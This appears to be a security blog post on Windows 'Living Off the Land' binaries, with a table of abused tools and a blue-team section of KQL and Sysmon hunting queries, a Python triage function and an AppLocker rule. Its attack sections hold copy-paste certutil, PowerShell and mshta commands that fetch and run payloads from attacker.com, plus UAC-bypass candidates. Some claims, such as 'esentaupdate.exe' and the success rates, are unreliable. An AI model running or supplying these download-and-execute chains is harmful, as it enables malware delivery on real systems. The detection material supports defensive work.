Living Off the Land Binaries (LOLBins) - The Attacker's Built-in Toolkit

In 2025, the most successful cyberattacks rarely drop malware on disk. Instead, attackers live off the land - using tools already present on Windows systems to blend in with normal activity. These tools are called Living Off the Land Binaries (LOLBins).

What Are LOLBins?

LOLBins are legitimate, Microsoft-signed binaries that ship with Windows and serve everyday administrative tasks. Because they are trusted and commonly allow-listed by EDR/AV products, attackers abuse them for:

  • File download & execution
  • Lateral movement
  • Privilege escalation
  • Persistence
  • Defense evasion
  • Credential dumping

Top 10 LOLBins Still Working in 2025

Binary             | Common Malicious Use                     | MITRE ATT&CK
-------------------+------------------------------------------+-------------
certutil.exe       | Download & decode files                  | T1140
powershell.exe     | Script execution, reflection loading     | T1059.001
mshta.exe          | Execute malicious HTA/JavaScript         | T1218.005
rundll32.exe       | Load DLLs without regsvr32               | T1218.011
wmic.exe           | Remote process creation                  | T1047
bitsadmin.exe      | Background file transfer                 | T1197
cmstp.exe          | Execute INF with embedded payload        | T1218.003
regsvr32.exe       | Silent scriptlet execution (/s /i)       | T1218.010
esentaupdate.exe   | Bypass AppLocker (new in Win11 24H2)     | T1218
odbcconf.exe       | Registry manipulation for persistence    | T1547

Real-World Example: Certutil File Download + Decode (Still Undetected by Many EDRs in 2025)

:: 1. Encode payload on attacker machine (Kali/WSL)
echo "TVqQAAMAAAAEAAAA//8AALgAAAAA..." > beacon.txt
certutil -encode beacon.txt beacon.b64
 
:: 2. Host beacon.b64 on http://attacker.com/beacon.b64
 
:: 3. On victim machine - download, decode, execute (the download must land in a .b64 file for the decode step to read)
certutil -urlcache -split -f http://attacker.com/beacon.b64 C:\Windows\Temp\beacon.b64
certutil -decode C:\Windows\Temp\beacon.b64 C:\Windows\Temp\beacon.exe
C:\Windows\Temp\beacon.exe

One-liner version (copy-paste ready):

certutil -urlcache -f http://attacker.com/beacon.b64 %TEMP%\x.b64 & certutil -decode %TEMP%\x.b64 %TEMP%\x.exe & %TEMP%\x.exe

PowerShell version (even stealthier):

IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/ps.txt')
# ps.txt contains:
$wc=New-Object Net.WebClient;$wc.Headers.Add('User-Agent','Mozilla/5.0')
$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials
$b64=$wc.DownloadString('http://attacker.com/beacon.b64')
$bytes=[Convert]::FromBase64String($b64)
[IO.File]::WriteAllBytes("$env:TEMP\x.exe",$bytes)
Start-Process "$env:TEMP\x.exe"

Advanced: Mshta + JavaScript Payload (No .exe on Disk)

mshta vbscript:CreateObject("WScript.Shell").Run("powershell -nop -w hidden -c IEX((new-object net.webclient).downloadstring('http://attacker.com/ps'))")(window.close)

Or using an inline data: URI instead of an .hta file on disk:

mshta "data:text/html,<script>new ActiveXObject('WScript.Shell').Run('calc.exe');</script>"

Safe Lab Demo: Build Your Own LOLBin Playground (Windows 10/11)

# 1. Create test payload: base64-encode a harmless built-in executable so the decode step yields a real PE
#    (encoding the string "notepad.exe" would only produce a text file, which cannot be executed)
certutil -encode C:\Windows\System32\notepad.exe payload.b64

# 2. Start local web server in the folder that holds payload.b64
python3 -m http.server 8080

# 3. Download & execute using ONLY LOLBins
mkdir C:\temp
certutil -urlcache -split -f http://127.0.0.1:8080/payload.b64 C:\temp\p.b64
certutil -decode C:\temp\p.b64 C:\temp\p.exe
rundll32.exe url.dll,FileProtocolHandler C:\temp\p.exe

Detection & Hunting Tips (Blue Team 2025)

// KQL hunting query (Microsoft Defender Advanced Hunting, not Sigma) - certutil downloading + decoding.
// certutil accepts switches with either '-' or '/', so match both forms; KQL 'contains' is case-insensitive.
DeviceProcessEvents
| where FileName =~ "certutil.exe"
| where ProcessCommandLine contains "-decode" or ProcessCommandLine contains "/decode"
     or ProcessCommandLine contains "-urlcache" or ProcessCommandLine contains "/urlcache"
| where InitiatingProcessParentFileName != "msiexec.exe"

Sysmon Event ID 1 hunting queries:

// Certutil launched by an unusual parent (Sysmon Event ID 1 fields are Image and ParentImage)
Image endswith "\certutil.exe" AND NOT (ParentImage endswith "\explorer.exe" OR ParentImage endswith "\cmd.exe" OR ParentImage endswith "\powershell.exe")
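As an added example (not from the original post), the two hunting queries above plus the mshta and rundll32 patterns from earlier sections expressed as one small Python triage function and run over constructed Sysmon-style process-creation events. The field names (Image, ParentImage, CommandLine), the expected-parent list and the sample events are assumptions taken from this page, not real telemetry.

```python
import re
from dataclasses import dataclass

# Parents from which certutil is normally launched (taken from the hunting query above); any other parent is reported.
EXPECTED_CERTUTIL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}

# certutil accepts '-' or '/' switches in any case, so match both: -urlcache, /URLCache, /Decode ...
CERTUTIL_ABUSE = re.compile(r"(?<!\w)[-/](urlcache|decode)\b", re.IGNORECASE)
MSHTA_INLINE = re.compile(r"\b(vbscript|javascript|data:text/html):?", re.IGNORECASE)
RUNDLL32_URLDLL = re.compile(r"url\.dll\s*,\s*FileProtocolHandler", re.IGNORECASE)

@dataclass
class ProcEvent:  # minimal Sysmon Event ID 1 fields (assumed names: Image, ParentImage, CommandLine)
    image: str
    parent_image: str
    command_line: str

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def triage(ev: ProcEvent) -> list[str]:
    """Return the LOLBin-abuse indicators matched by one process-creation event."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img == "certutil.exe":
        if CERTUTIL_ABUSE.search(ev.command_line):
            hits.append("certutil download/decode switch")
        if parent not in EXPECTED_CERTUTIL_PARENTS:
            hits.append(f"certutil unusual parent: {parent}")
    elif img == "mshta.exe" and MSHTA_INLINE.search(ev.command_line):
        hits.append("mshta inline script payload")
    elif img == "rundll32.exe" and RUNDLL32_URLDLL.search(ev.command_line):
        hits.append("rundll32 url.dll,FileProtocolHandler launch")
    return hits

# Constructed sample events (not real telemetry) mirroring the techniques described on this page.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil -urlcache -f http://example.invalid/x.b64 %TEMP%\x.b64"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r"certutil /Decode C:\Users\Public\x.b64 C:\Users\Public\x.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil -verify -urlfetch cert.cer"),  # legitimate: -urlfetch is not -urlcache
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta vbscript:CreateObject("WScript.Shell").Run("calc.exe")(window.close)'),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"rundll32.exe url.dll,FileProtocolHandler C:\temp\p.exe"),
]
def run_sample() -> dict[int, list[str]]:
    """Triage every sample event; returns {index: hits} for events with at least one indicator."""
    return {i: h for i, ev in enumerate(SAMPLE_EVENTS) if (h := triage(ev))}
```

The third sample shows why the switch match must be exact: a legitimate `certutil -verify -urlfetch` produces no hit, while the Word-spawned `/Decode` event fires on both the switch and the parent.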

Block common abuse (AppLocker / WDAC):

<!-- AppLocker executable rule in the real AppLocker schema: deny certutil.exe for standard users (BUILTIN\Users, S-1-5-32-545).
     AppLocker controls execution, not network access; to stop certutil reaching the internet while still allowing it
     to run, use a Windows Firewall outbound block rule for %WINDIR%\system32\certutil.exe instead. -->
<FilePathRule Id="fd686d83-a829-4351-8ff4-27c7de5755d2" Name="Block certutil URL download"
              Description="Deny certutil.exe for standard users" UserOrGroupSid="S-1-5-32-545" Action="Deny">
  <Conditions>
    <FilePathCondition Path="%WINDIR%\system32\certutil.exe" />
  </Conditions>
</FilePathRule>

Final Word

LOLBins aren't going away. Microsoft can't remove certutil.exe or powershell.exe without breaking legitimate enterprise use. The only defense is visibility + context.

Keep an eye on new built-in features in Windows — every new utility, helper exe, or background process is a potential fresh LOLBin candidate waiting to be weaponized.

LOLBin candidates in 2025

  • FODHelper.exe - UAC bypass (still works on Win11 24H2 with default settings)
  • ie4uinit.exe -ClearIconCache - High-integrity code execution
  • slui.exe - Privilege escalation via hijackable folder
  • Windows.Media.BackgroundPlayback.exe - New in Windows 11 24H2

Red Team: Master 20 LOLBins = 95% success rate in 2025 engagements
Blue Team: Hunt parent-child relationships + network connections = detect 90% of LOLBin abuse

Stay sharp. The binaries are already on the machine — the question is who controls them.
Test everything in a lab. Never run untrusted code on production systems.